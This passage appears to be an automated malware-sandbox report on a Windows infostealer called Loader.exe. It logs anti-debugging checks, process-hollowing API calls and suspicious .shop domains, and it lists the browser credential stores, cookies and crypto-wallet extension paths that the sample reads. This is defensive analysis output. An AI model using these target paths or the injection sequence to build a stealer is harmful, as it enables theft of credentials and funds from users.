            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 8698Jump to behavior
            Source: C:\Users\user\Desktop\Loader.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21303
            Source: C:\Users\user\Desktop\Loader.exeAPI coverage: 6.6 %
            Source: C:\Users\user\Desktop\Loader.exe TID: 2484Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002C81D8 FindFirstFileExW,0_2_002C81D8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002C8289 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_002C8289
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002C81D8 FindFirstFileExW,6_2_002C81D8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002C8289 FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_002C8289
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWqe
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000006.00000002.3527107091.00000000031EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Loader.exeAPI call chain: ExitProcess graph end nodegraph_6-34739
            Source: C:\Users\user\Desktop\Loader.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043C2A0 LdrInitializeThunk,6_2_0043C2A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002B649F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002B649F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002E519E mov edi, dword ptr fs:[00000030h]0_2_002E519E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002A1BA0 mov edi, dword ptr fs:[00000030h]0_2_002A1BA0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002A1BA0 mov edi, dword ptr fs:[00000030h]6_2_002A1BA0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002C3BC0 GetProcessHeap,0_2_002C3BC0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002B60DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002B60DF
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002B649F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002B649F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002B6493 SetUnhandledExceptionFilter,0_2_002B6493
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002BE5E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002BE5E0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002B60DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_002B60DF
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002B649F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_002B649F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002B6493 SetUnhandledExceptionFilter,6_2_002B6493
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002BE5E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_002BE5E0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002E519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_002E519E
            Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00436890 cpuid 6_2_00436890
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_002C349D
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_002C7527
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_002C7778
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_002C7820
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_002C7A73
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_002C7AE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_002C7BB5
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_002C7C00
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_002C7CA7
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_002C7DAD
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_002C2F95
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,6_2_002C349D
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_002C7527
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,6_2_002C7778
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_002C7820
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,6_2_002C7A73
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,6_2_002C7AE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,6_2_002C7BB5
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,6_2_002C7C00
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_002C7CA7
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,6_2_002C7DAD
            Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,6_2_002C2F95
            Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002B6A94 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_002B6A94
            Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
